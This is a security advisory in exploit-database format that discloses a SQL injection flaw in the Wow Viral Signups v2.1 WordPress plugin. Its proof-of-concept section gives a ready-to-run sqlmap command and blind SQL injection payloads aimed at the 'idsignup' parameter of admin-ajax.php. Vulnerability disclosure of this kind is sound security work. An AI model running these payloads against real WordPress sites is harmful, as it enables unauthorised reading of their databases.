47 lines
No EOL
1.6 KiB
Text
47 lines
No EOL
1.6 KiB
Text
# Exploit Title: Wow Viral Signups v2.1 WordPress Plugin SQL Injection
|
|
# Date: 29/03/2017
|
|
# Exploit Author: TAD GROUP
|
|
# Vendor Homepage: http://wow-company.com/
|
|
# Software Link: https://wordpress.org/plugins/mwp-viral-signup/
|
|
# Version: 2.1
|
|
# Contact: info[at]tad.group
|
|
# Website: https://tad.group
|
|
# Category: Web Application Exploits
|
|
|
|
1. Description
|
|
|
|
An unescaped parameter was found in Wow Viral Signups v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
|
|
The POST parameter 'idsignup' is vulnerable.
|
|
|
|
2. Proof of concept
|
|
|
|
sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=mwp_signup_send&email=GING%40MAIL.RU&hvost=%3Fpage_id%3D47&idsignup=1" --dbs --threads=10 --random-agent --dbms mysql
|
|
|
|
Parameter: idsignup (POST)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND 5272=5272
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
|
|
Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hXXu)
|
|
|
|
3. Attack outcome:
|
|
|
|
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
|
|
|
|
4. Impact
|
|
|
|
Critical
|
|
|
|
5. Affected versions
|
|
|
|
<= 2.1
|
|
|
|
6. Disclosure timeline
|
|
|
|
15-Mar-2017 - found the vulnerability
|
|
15-Mar-2017 - informed the developer
|
|
29-Mar-2017 - release date of this security advisory
|
|
|
|
Not fixed at the date of submitting this exploit. |